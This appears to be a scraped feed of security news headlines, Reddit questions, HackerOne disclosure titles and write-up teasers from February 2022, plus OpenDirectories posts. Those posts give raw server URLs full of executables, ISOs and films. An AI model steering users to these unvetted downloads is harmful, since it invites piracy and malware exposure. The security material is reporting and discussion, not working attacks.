    https://download.d-l.fr/apache_listing/ or https://download.d-l.fr (It's the same content but different UI ) http://s472165864.onlinehome.fr/anywarare/index.php?dir=| Url: https://download.d-l.fr/apache_listing/ Urls file Extension (Top 5) Files Size .iso 112 233,52 GiB .zip 101 24,71 GiB .exe 169 17,93 GiB .xz 7 4,65 GiB .1 1 4,4 GiB Dirs: 150 Ext: 46 Total: 572 Total: 296,05 GiB Date (UTC): 2022-02-10 00:55:22 Time: 00:00:35 Speed: 23,48 MB/s (187,8 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) Url: http://s472165864.onlinehome.fr/anywar... Urls file Extension (Top 5) Files Size .zip 808 69,32 GiB .iso 26 63,33 GiB .exe 604 60,11 GiB .001 2 6,6 GiB .002 2 6,4 GiB Dirs: 285 Ext: 23 Total: 1 868 Total: 212,62 GiB Date (UTC): 2022-02-10 00:59:03 Time: 00:00:09 Speed: Failed Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    Watch "Welcome to C0V3RT - Exploration of ALL THINGS "Covert Entry"" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
    Dump Information for Process using GetTokenInformation
    In this post, you will get a very thorough step-by-step walkthrough on building your own process token dumper in the c++ which will help you in knowing your target better before launching another post exploitation attack. https://tbhaxor.com/dumping-token-information-in-windows/ submitted by /u/tbhaxor [link] [comments]
  • Open

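    Perks | Colorful picks to enjoy the Lantern Festival: come celebrate at the FB Mall!
    February 14-17: celebrate the Lantern Festival at the FB Mall
    Cloned Pirate Bay sites are serving malicious ads to millions of users
    CyberNews security researchers found that five malicious sites posing as the well-known BitTorrent piracy site The Pirate Bay serve malicious ads to more than 7 million users every month.  ( 1 min )
    "Guangdong Province Public Data Security Management Measures (Draft for Comment)" released, emphasizing the security of public data
    The draft consists of 6 chapters and 32 articles; it strengthens security management of digital-government public data, regulates public data processing activities, promotes the orderly development and use of data resources, and protects the lawful rights and interests of individuals and organizations.
    Notes on an incident response to a cryptomining virus
    Notes on an incident response to a cryptomining virus  ( 1 min )
    Mini program testing workflow
    The workflow has two parts: unpacking can uncover information leaks and hidden interfaces, while packet capture can be used to test for logic flaws and API security issues.  ( 1 min )
    Be careful with Windows 11 updates: malware already has them in its sights
    Just as Windows 11 enters broad deployment, the RedLine malware gang has quietly set its sights on this wave of updates and has made ample pre-attack preparations.  ( 1 min )
    FreeBuf Morning Report | Intel discovers 16 new BIOS-related vulnerabilities; Pirate Bay clones target millions of users with malware
    CyberNews researchers found five Pirate Bay clones that serve malicious ads to more than 7 million users each month.  ( 1 min )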
  • Open

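    Strengthening ZAP Scanning with Custom Payloads 🚀
    Today I'd like to introduce a ZAP feature I've been watching with some interest lately: Custom Payloads. It lets you test against a specified set of payloads more easily, without using the Fuzzer or ZAP's scripting engine, so I think it's worth knowing for security testing or building automation. Let's get started :D Custom Payloads: Custom Payloads is a feature and add-on that lets ZAP's Active Scan and Passive Scan use payloads specified by the user. So far two categories are available, and because it runs attached to scans, I think the benefit of the feature will grow as more categories are added.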

  • Open

    Is there a way to find out what server/ip address a program accesses?
    I'm trying to find the server so I can ping to that manually but I don't know if that's possible. I'm almost a beginner in this, I want to know the pinging time. submitted by /u/Mayhem_8116 [link] [comments]  ( 1 min )
    Why is it common practice to reset a password after a few failed attempts?
    Hi Netsec people! Every once in a while I will get emails saying that some website/service I’m registered on has reset my password because of too many failed log in attempts. Now I’m not too surprised by the attempts, since according to HaveIBeenPwned, my credentials have been ‘exposed’ over 30 times in breaches dating back to the early 2010s. However, a while back I gave up my terrible practice of using 1 password across multiple services and migrated to using a password manager, and now all of my passwords to every service I’m on are randomly generated, so I’m not too worried by these attempts. My question is this: Why does the most common practice seem to be for services to reset your password after a few failed attempts? To me that seems like if x log in attempts failed, the password was robust/held up—why force the user to change it? If the user used a random generator, repeated tries that are time separated (I.e. wait 10min before trying again) probably won’t get an attacker anywhere. If a person isn’t using a password manager/generator then forcing the user to reset might actually lead them to use a weaker password since they will have to come up with something familiar, and there are only so many familiar items a person can keep track of at a time… I’d love to hear some insights on to why this reset after x tries approach appears to be such a pervasive (and counterintuitive) practice! Sorry if this isn’t the right place for a question like this! submitted by /u/KrishanuAR [link] [comments]  ( 2 min )
    Hosts making DNS queries to malicious site. How to dig deeper and find source?
    I have some infected hosts in LAN making a communication with C&C server and bots but that URL seems to be hidden behind Cloudflare CDN as per wireshark sniffing on infected host. In other words, I must say hosts are making DNS queries to malicious site. Our PAs with DNS filtering has blocked the domain since it flagged as malicious How I can find the source of infection on the host ? Any tools I can use which process or application making DNS queries ? Any advise how to dig deeper and what process is making these queries so we can get rid of these logs ? submitted by /u/techno_it [link] [comments]  ( 3 min )
    Does this report that Palestinian threat actor is behind new Mid East phishing attacks sound right?
    Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said via Threatpost. https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/ submitted by /u/Technical-Tea-4902 [link] [comments]  ( 1 min )
    RCE vs Command Injection
    Hi, what's the difference between RCE and Command Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Setting up a security program
    So a long time ago some of the higher ups decided we should have a security program within our product development, the idea was that there would be one person in each scrum team responsible for promoting security and they would get some additional training to help with that. Like a lot of these central programs it continued for a few months and then was quickly forgotten about. Now I've been tasked with setting up our own version in the division as the central version is pretty much dead but they're still pushing the general idea. This is what is currently on my list - Security champions to be Security+ certified (I know it's a broad basic cert but I figure we can get funding for this and then progress to more advanced targeted training) - Add a method into Jira for tracking security related issues separately - Create discrete security projects as epics so we can fix some of the legacy issues completely and not worry about them anymore (current ideas for these include: removing third party services to reduce exposure, updating some very old libraries, updating SQL user security etc) Any other ideas of things I could introduce? submitted by /u/dbxp [link] [comments]  ( 3 min )
    CVSS calculation weight reasoning
    Hello AskNetsec. I was wondering if there is a resource describing the CVSS calculation reasoning. Not just how the CVSS is calculated but also the reasoning behind the weight of the different variables. For example in the specification (https://www.first.org/cvss/specification-document) under "CVSS v3.1 Equations", WHY is ISS = 6.42 * ISS? Where does 6.42 come from? Is there any research paper or whitepaper for this? submitted by /u/someuserman [link] [comments]  ( 1 min )
    Question: patching built-in Python on macOS
    Do I need to patch / install a new version of Python manually in order to fix the vulnerability of Python on my macOS? For example, my macOS is upgraded to Monterey 12.1, but my Python version is still 3.7.9, which is vulnerable to CVE-2021-3177. I tried to search whether the vulnerability, say CVE-2021-3177, affects my version of macOS. However, Apple doesn't seem to have put that information into their security update documentation. submitted by /u/20151124 [link] [comments]  ( 1 min )
  • Open

    npm weak links
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]
    New release of 🔥Kubesploit v0.1.3🔥
    submitted by /u/jat0369 [link] [comments]
    Top 10 web hacking techniques of 2021
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    My SQLi adventure or: why you should make sure your WAF is configured properly
    submitted by /u/gsk-upxyz [link] [comments]
  • Open

    Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102546 - Bounty: $500
    staffOrderNotificationSubscriptionDelete Could Be Used By Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102660 - Bounty: $500
    staffOrderNotificationSubscriptionCreate Is Not Blocked Entirely From Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102652 - Bounty: $900
    Race condition in User comments Likes
    Zomato disclosed a bug submitted by 0xdexter: https://hackerone.com/reports/1409913 - Bounty: $150
    Reflected xss on ads.tiktok.com using `from` parameter.
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1452375 - Bounty: $6000
  • Open

    Coordinated vulnerability disclosure (CVD) for open source projects
    Article URL: https://github.blog/2022-02-09-coordinated-vulnerability-disclosure-cvd-open-source-projects/ Comments URL: https://news.ycombinator.com/item?id=30278015 Points: 1 # Comments: 0  ( 8 min )
  • Open

    Basic Web Technologies Knowledge required for starting with the web Exploitation Part 1
    Hello Guys Myself Manan Aggarwal BTech Student is here Present you the information about the Basic Technology which you need to require… Continue reading on Medium »  ( 4 min )
    Hacking with Rake
    Rake is a utility that can be used to automate tasks. For example, if a program needs to be set up in a certain way. Rake could be used to… Continue reading on Medium »
    How i made 15k$ from Remote Code Execution Vulnerability
    Hello Everyone 👋 Continue reading on Medium »  ( 1 min )
    How I hacked Google to read files from their servers for free!
    Hey Guys, This is Harish! I used to hunt to Microsoft and Google VRP, This is my first write up! Continue reading on Medium »  ( 1 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it. Continue reading on InfoSec Write-ups »  ( 3 min )
    QuickSwap’s New UI Alpha $50,000 Bug Bounty
    TL; DR: Continue reading on Medium »  ( 1 min )
    XDAG new version of wallet (0.4.0) officially released
    Repost of the 2011–11–05 news on xdag.io Continue reading on Medium »  ( 1 min )
    XDAG Mars Project
    repost of 2021–05–09 news on xdag.io Continue reading on Medium »  ( 4 min )
    XDAG Java Edition Testing Tutorial
    Hello to all, As some of you know, we are currently working on making the project more attractive to developers. Continue reading on Medium »  ( 2 min )
    Login function module: User Authentication .
    Input: User id and Password SQL: select * from admin where user_id = 'admin' and password='****' Continue reading on Medium »
  • Open

    Introducing BloodHound 4.1 — The Three Headed Hound
    Prior Work Continue reading on Posts By SpecterOps Team Members »  ( 3 min )
    CRTO Review (Certified Red Team Operator)
    I had a certificate by successfully completing the CRTO exam in the past days, and while my knowledge was still fresh, I decided to write… Continue reading on Medium »  ( 4 min )
    Raspberry Pi Pico as a Rubber Ducky
    Setup Continue reading on Medium »  ( 1 min )
  • Open

    Top 10 Security Tips to Keep Your WordPress Site Healthy
    As we go through the winter months and the weather changes, many of us go to our local pharmacy and take advantage of a flu shot. We do this because maybe we have had the flu before and the second of pain from the jab is nothing in comparison to the hours and days of sickness from catching the flu bug.  As everyone’s grandparents tell them, “An ounce of prevention is worth a pound of cure. Continue reading Top 10 Security Tips to Keep Your WordPress Site Healthy at Sucuri Blog.
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challenge  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    An introduction to the SSRF attack can be read in the separate Medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    SecWiki News 2022-02-09 Review
    2022 Ransomware and Malware Report, by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Movies and TV-shows (Good speed)
    submitted by /u/lnsideMyHead [link] [comments]
    Anime and some Music
    submitted by /u/mingaminga [link] [comments]
    Index of /Johnny Cash CDs/
    submitted by /u/mingaminga [link] [comments]
    A lot of software, Games, Film and series in various language
    http://103.222.20.150/ftpdata/ Url: http://103.222.20.150/ftpdata/ Urls file Extension (Top 5) Files Size .mp4 12,912 11.59 TiB .mkv 9,042 9.3 TiB .avi 2,965 1.38 TiB .rar 21 36.18 GiB 16 19.15 GiB Dirs: 16,920 Ext: 59 Total: 46,363 Total: 22.4 TiB Date (UTC): 2022-02-08 23:34:44 Time: 01:48:31 Speed: 0.00 MB/s (0.0 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    CVE-2022–22718: Windows Print Spooler Privilege Escalation
    Article URL: https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81?gif=true Comments URL: https://news.ycombinator.com/item?id=30273774 Points: 3 # Comments: 1  ( 11 min )
    CVE-2022-21703: cross-origin request forgery against Grafana
    Article URL: https://jub0bs.com/posts/2022-02-08-cve-2022-21703-writeup/ Comments URL: https://news.ycombinator.com/item?id=30270751 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Simply GeoEstimation — OSINT Challenge 13
    On Dec 20, 2021, OSINT Dojo shared an OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 10
    In this article I will explain how to solve Hacktoria’s Geolocation 10 challenge. However, I must give a quick disclaimer first. I already… Continue reading on Medium »  ( 5 min )
  • Open

    Can deleted WhatsApp conversations from an iPhone be recovered without backup?
    I deleted a very important conversation on WhatsApp 2 days ago. The iPhone 12 (running iOS 15.x) in question has been powered off and hasn't been used since. I understand that WhatsApp saves a backup copy in Android phones' local memory every day at 2am and erases them every 7 days; however, I can't find anything about iOS devices. To make matters worse, I deleted the conversation around 7pm, so before the local backup could trigger at 2am. Is there any chance to get this conversation back without any backup? And what would my chances be with a Cellebrite device? submitted by /u/Strangedreamest [link] [comments]  ( 2 min )
  • Open

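    Information Security Technology: Guidelines for Lifecycle Security Management of Mobile Internet Applications (Apps) (Draft for Comment) released
    The Draft for Comment has six chapters: scope, normative references, terms and definitions, abbreviations, overview, and lifecycle management. It gives guidance on security requirements, security recommendations, security management and related matters.
    FreeBuf Morning Report | "Roaming Mantis" is targeting Europe; Vodafone Portugal hit by large-scale cyberattack
    Vodafone Portugal suffered a cyberattack that severely disrupted communications and television services in the country.  ( 1 min )
    SlowMist: analysis of the details of US law enforcement cracking the 2016 Bitfinex hack
    One open question: who is the hacker who actually attacked Bitfinex and stole the coins?  ( 1 min )
    NetWalker ransomware member sentenced to 80 months in prison
    Canadian man Sebastian Vachon-Desjardins was recently sentenced to six years and eight months in prison for taking part in NetWalker ransomware attacks.
    On SSRF and various bypass methods
    SSRF vulnerabilities arise mainly because an interface provided by the server includes a URL parameter for the content to be requested, and the URL parameter sent by the client is not filtered.  ( 1 min )
    Puma data leak caused by ransomware attack; Microsoft fixes 48 security vulnerabilities | Global cybersecurity highlights for February 9
    Sportswear maker Puma suffered a data breach following a ransomware attack in December 2021 on Kronos, one of its North American workforce management service providers.
    Survey of the global state of industrial cybersecurity
    [Editor's note] Industrial organizations faced major challenges in 2021. Cyberattacks on the Oldsmar, Florida water facility, Colonial Pipeline and JBS, as well as Solar  ( 1 min )
    "Roaming Mantis" malware extends its reach into Europe
    Criminals can use the stolen photos to obtain money in other ways, such as blackmail or sexual harassment.  ( 1 min )
    Israeli surveillance company QuaDream exposed
    “According to five people familiar with the matter, a flaw in Apple's software that Israeli surveillance company NSO Group exploited in 2021 to break into iPhones was simultaneously abused by a competing company.” According to the article published by Reuters, “it was revealed that the company, named QuaDream, is a smaller, lower-profile Israeli company that also develops smartphone hacking tools for government clients.” QuaDream was founded by former Israeli military officer Ilan Dabelstein and two former NSO employees, Guy Geva and  ( 1 min )
    Microsoft disables the ms-appinstaller protocol to stop malware from spreading
    Microsoft announced that it has temporarily disabled the ms-appinstaller protocol of the MSIX App Installer on Windows 10/11 to prevent abuse by malware.
    Please update promptly: Microsoft fixes 48 important vulnerabilities and 1 zero-day in February
    On February 8, 2022, Microsoft released a series of vulnerability patches, fixing 48 vulnerabilities in total as well as one zero-day vulnerability.  ( 1 min )
    "14th Five-Year" Development Plan for Financial Standardization released, strengthening financial cybersecurity standards protection
    The Plan proposes strengthening the protection provided by financial cybersecurity standards; improving the system of cybersecurity and data security standards for the financial industry; and establishing and improving a system of standards for protecting critical information infrastructure in the financial industry, to support stronger security protection capabilities.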
  • Open

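    PrivateLoader: the first step in many malware schemes
    Translator: Knownsec 404 Lab translation team. Original link: https://intel471.com/blog/privateloader-malware Pay-per-install (PPI) malware services have long been an integral part of the cybercrime ecosystem. Malware operators provide payment, malicious payloads and targeting information, and those responsible for running the service outsource the distribution and delivery. Accessibility and moderate cost allow malware operators to use these services as a weapon for rapid, bulk...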
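    Rebuilding the world: a review of The Sandbox arbitrary burn vulnerability
    Author: Victory@SlowMist Security Team. Original link: https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ According to SlowMist Zone intelligence, on January 28, 2022 The Sandbox officially published an announcement of a LAND smart contract migration, but the announcement did not say what specifically was wrong with the contract. The SlowMist Security Team shares a brief analysis below. Project background: The Sandbox is a virtual...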
  • Open

    Hypothetical incident: what would be an appropriate response?
    Hello AskNetSec! I am curious what you all would consider an appropriate response to an incident such as a user reporting that they've clicked on a phishing link. Personally, I believe it is appropriate to probe about what popped up after clicking the link, whether or not they entered any of their information, and whether or not they notice any abnormal behavior on their computer after clicking on the link. After that, have the user change their password as a precaution and move on begin monitoring. I figure between the questions assuring they did nothing more than click, a password change, existing security controls such as CrowdStrike, and monitoring for abnormal behavior, there isn't much more that makes sense to do. Others on my team seem to think it's worth downloading Microsoft Safety Scanner and running a full system scan, which I argue doesn't hurt, but also probably doesn't add much value unless something is seen on the user's computer that would prompt further investigation. Especially since I can't imagine Microsoft Safety Scanner is going to pick up on something that CrowdStrike does not. Understandably, different companies may expect different responses based on established policy and regulations. But I want to leave it kind of open ended and see what other IT and security professionals believe is appropriate for these types of incidents? How deep do you go for these types of things? submitted by /u/unseenspecter [link] [comments]  ( 2 min )
    IR Retainer things to consider
    When looking to purchase Incident Response Retainers what are things you wish you knew prior to purchasing? Are there any gotchas that should be considered? What can I learn from you in your experience with this? submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    What level of knowledge should Tier 1 SOC analysts have to enter the job?
    Each of the sub-branches of cyber security is like a different world for itself, there is no end when you want to learn. For example, we agree that it is necessary to have knowledge about malware analysis for the position of security analyst. However, if you try to improve yourself in malware analysis, you can probably only work on malware analysis for years. At this point, many people do not know how much technical knowledge is required to get started. For this reason, many people cannot be accepted to the job due to an insufficient level in job applications, or the starting process may take longer as people spend too much time on training and develop technical knowledge more than the level required to start the job. In your opinion, what should be the technical level required to start working in the security analyst position? submitted by /u/umuttosun [link] [comments]  ( 2 min )
    Infosec as "just" a job?
    Hi, I'm a CS student who's been learning a mishmash of basics to get into infosec — some assembly, wifi cracking, sql injection, etc under my belt, just the very basics, but I'm kind of overwhelmed by how... Enthusiastic and into it everyone seems to be. I'm not sure I'm "built" for it either, since I can't relate to the culture about stuff like lockpicking and causing trouble in school networks and stuff. Never done any social engineering in my life. I'm more of a science guy, and I went into CS because I'm aiming for a practical job that's in STEM. That's it, really. I'm willing to learn things in my spare time but I can't dredge up the same intense curiosity I see in people I've seen both IRL and online in security. Will I drown? Should I look elsewhere? submitted by /u/Wild_Rutabaga_3099 [link] [comments]  ( 4 min )
    Malware playbooks
    I was wondering what your malware playbooks look like. We got a bunch of malware alerts today for items that were deleted by the av. It caused some internal discussions on common practices. submitted by /u/xX_s0up_Xx [link] [comments]  ( 1 min )
    How to become a pen tester ?
    submitted by /u/AlmightyMemeLord404 [link] [comments]  ( 3 min )
    Any insights on purchasing Palo Alto firewalls for home/lab use?
    I see a wide range of pricing for the PA-200 through 400 models and am not sure why. Anybody else running a small PAN device in their homelab have insight on purchasing a refurb and maybe one or two subscriptions setup on it? Is it best to look for an authorized dealer or is eBay safe? submitted by /u/EnterNam0 [link] [comments]  ( 1 min )
  • Open

    Kubernetes for pentesters
    There are countless articles on hacking kubernetes clusters but is there any research or repos on how you can use k8s for pen testing? One idea is using a cluster in which each node is a “person” that has access to a specific machine or to a different machine. I’m open to other ideas regarding the usage of k8s to improve hacking automation submitted by /u/sirlordjax [link] [comments]  ( 1 min )
    Invisible Sandbox Evasion - Check Point Research
    submitted by /u/dmchell [link] [comments]
    Helping users stay safe: Blocking internet macros by default in Office
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Some OS ISO (Fast Download)
    Some Linux and Windows (Some in Pt/de/ru/en) ISO, The server has a pretty decent speed Url: https://root3.minerswin.de/ISO/ Urls file Extension (Top 5) Files Size .iso 102 195,47 GiB .zip 50 60,06 GiB .xz 18 14,95 GiB .ova 4 11,6 GiB .7z 2 3,7 GiB Dirs: 71 Ext: 12 Total: 323 Total: 288,59 GiB Date (UTC): 2022-02-08 23:22:22 Time: 00:00:03 Speed: 46,65 MB/s (373,2 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Random Stuff in French
    http://5.196.72.204/ Url: http://5.196.72.204/ Urls file Extension (Top 5) Files Size .mkv 141 459,53 GiB .avi 99 70,71 GiB .mp4 533 51,46 GiB .tar 1 28 GiB .m2ts 33 27,8 GiB Dirs: 532 Ext: 58 Total: 4 362 Total: 683,72 GiB Date (UTC): 2022-02-08 23:08:45 Time: 00:00:07 Speed: 11,11 MB/s (88,9 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    French Film & Series
    http://www.zoppello.fr/download/ Url: http://www.zoppello.fr/download/ Urls file Extension (Top 5) Files Size .mkv 937 668,57 GiB .avi 66 68,38 GiB .mp4 61 22,63 GiB .ts 5 17 GiB .flv 17 7,07 GiB Dirs: 187 Ext: 15 Total: 1 405 Total: 790,34 GiB Date (UTC): 2022-02-08 23:07:02 Time: 00:00:04 Speed: 11,05 MB/s (88,4 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    South Park
    Hey everyone looking for South Park season downloads thanks in advance submitted by /u/Los-Aragon [link] [comments]
  • Open

    SharpSQL: C# MS SQL enum and exploitation
    submitted by /u/IamaCerealKilla [link] [comments]
    SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022–22718)
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
    How Docker Made Me More Capable and the Host Less Secure
    submitted by /u/jat0369 [link] [comments]
    AWS Cloud Security Challenges
    submitted by /u/0xdeadbeef0000 [link] [comments]
    PPE - Poisoned Pipeline Execution. Running malicious code in your CI, without access to your CI
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]  ( 1 min )
    How open-source packages handle releasing security fixes
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    VSCode Remote Development Extension Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21991 Comments URL: https://news.ycombinator.com/item?id=30262516 Points: 8 # Comments: 0
  • Open

    100 Days of Hacking — DAY 4
    Objectives of day 4 : Continue reading on Medium »  ( 1 min )
    SQL Injection, Reflected XSS and Information Disclosure in one subdomain in just 10 minutes
    Hi there, 7odamo is here. First of all this is my first write-up and I am still a beginner, so I might write something wrong. Then it’s… Continue reading on Medium »  ( 3 min )
    100 DAYS OF HACKING — DAY 3
    woohoo, sup fellow hackers. it’s day 3 / 100 we have a long way to go. Continue reading on Medium »  ( 1 min )
    Securing Lichess one move at a time
    Hi there, thanks for stopping by and taking some time to read my blog post about how I helped secure my favorite chess playing which if… Continue reading on Medium »  ( 1 min )
    Privilege Escalation Using Wildcard Injection | Tar Wildcard Injection |
    This blog is about how to use Wildcard Injection to escalate privileges to root in Unix-like OS. Continue reading on System Weakness »  ( 2 min )
    Full Account takeover (ATO) — a tale of two bugs
    Hi everyone, I hope we’re all having a swell day. Before I jump into today's bug report, I’d like to express my sincerest gratitude for… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »  ( 2 min )
    APWine Incorrect Check of Delegations Bugfix Review
    In the Web2 world, a simple oversight in the code doesn’t always result in a huge breach of data (of course, sometimes they do). In Web3… Continue reading on Immunefi »  ( 4 min )
    2FA Bypass Techniques
    Hello lads, it’s me again. Let’s discuss different techniques about bypassing 2FA. Continue reading on Medium »  ( 2 min )
    You Can Takeover Any GOOGLE Account !
    Thank you for taking the time to read about “ You Can Takeover Any GOOGLE Account ! ” Continue reading on Medium »  ( 2 min )
  • Open

    What is OSINT(Part 2): Dangers of Oversharing
    This article was written in collaboration with Aardwarewolf Continue reading on Medium »  ( 7 min )
    What is OSINT? (Part 2)
    The dangers of oversharing Continue reading on Medium »  ( 8 min )
  • Open

    Something's Amiss . . .
    Hello everyone...super noob alert: I'm taking a digital forensics class and rather than using the virtual lab decided to do some memory analysis on my machine. Since I know little about computers and even less about what I'm looking at, maybe I'm being paranoid, but maybe you can shed some light? As I don't know the email addresses, nor do email addresses like "stealerbyframe@mail.ru", "360saftfirehackr@qq.com", or my favorite "pizda@qq.com"--inspire confidence, those addresses raised some alarms. I used FTK Imager to do a memory dump on my system. I then used Bulk Extractor to organize the data a bit and the screen shot is some emails I found in the email.txt file result. Why, for example, are they in my computer's memory!? https://preview.redd.it/9orfvtravmg81.png?width=1326&format=png&auto=webp&s=65d81163bcd0e35d26a7cc2c88a5025762e36d9a https://preview.redd.it/80togtravmg81.png?width=509&format=png&auto=webp&s=3d14c00dbe7395beb8e682bd2fe0cc50e7d66277 submitted by /u/Funny-Appearance9167 [link] [comments]  ( 2 min )
    Beginner-level mini-course on starting a new investigation with Autopsy. Covers data organization, documentation, new case creation, ingest modules, basic analysis workflow, and exporting reports.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-08 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Beaconfuzz - A Journey into #Ethereum 2.0 Blockchain Fuzzing and Vulnerability Discovery
    submitted by /u/pat_ventuzelo [link] [comments]
    Top 6 Books to learn the Rust Programming Language in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Object Overloading
    Using an OS binary to carry out our bidding has been a tactic employed by Red Teamers for years. This eventually led to us coining the term LOLBIN. This tactic is typically used as a way of flying under the radar of EDR solutions or to bypass application whitelisting by surrounding our code in the... The post Object Overloading appeared first on TrustedSec.  ( 12 min )
  • Open

    Cross-site Scripting (XSS) - Stored | forum.acronis.com
    Acronis disclosed a bug submitted by quadrant: https://hackerone.com/reports/1161241 - Bounty: $50
    Stored Cross-site Scripting on devicelock.com/forum/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1122513 - Bounty: $50
    Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com
    Acronis disclosed a bug submitted by ashmek: https://hackerone.com/reports/1018790
    Attacker Can Access to any Ticket Support on https://www.devicelock.com/support/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1124974 - Bounty: $250
    Information Disclosure via ZIP file on AWS Bucket [http://acronis.1.s3.amazonaws.com]
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1121771
  • Open

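    2021 Global Industrial Cybersecurity Situation Report
    Drawing on 50 issues of its 2021 weekly security situation bulletin, 六方云 analyzes in detail the current state of global industrial security and surveys the industrial security situation from multiple angles, providing a useful reference for those responsible for industrial security.  ( 1 min )
    Research on detecting and exploiting command execution when no output is echoed
    During penetration testing, vulnerability discovery or security research, we run into many command execution points that return no output.  ( 1 min )
    FreeBuf Morning Report | Meta threatens to leave Europe; there are no free "red envelopes" online
    Meta has threatened that it will consider leaving Europe if the EU does not allow the company's US operations, applications and data centers to share EU user data.  ( 1 min )
    Incident response case analysis: the site X phishing email
    There are many articles on incident response, but few on how to put incident response into practice using the SANS and NIST framework models. This is a simple model-based analysis of the current site X phishing email case, offered only as a personal view.  ( 1 min )
    Morley, a company serving the global top 100, hit by ransomware attack, leaking a large amount of user information
    The types of data leaked include: names, addresses, Social Security numbers, dates of birth, client identification numbers, medical diagnosis and treatment information, and health insurance information.
    Shanghai's first "Enterprise Data Compliance Guidelines" released
    The Guidelines comprise six chapters and thirty-eight articles, and mainly set out rules for enterprises' data compliance management structure and for identifying and handling risk.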
  • Open

    CVE-2021-4160: OpenSSL carry propagation bug in some TLS 1.3 default curves
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-4160 Comments URL: https://news.ycombinator.com/item?id=30256773 Points: 2 # Comments: 0  ( 4 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    Roaming Mantis malware threatens Europe
    Translator: Knownsec 404 Lab (知道创宇404实验室) translation team. Original link: https://securelist.com/roaming-mantis-reaches-europe/105596/ Roaming Mantis is a malicious campaign that targets Android devices and spreads mobile malware via phishing SMS messages. We have been tracking Roaming Mantis since 2018 and have published five blog posts about this campaign: Roaming Mantis uses DNS hijacking to...
    SoK: An Analysis of Browser Security
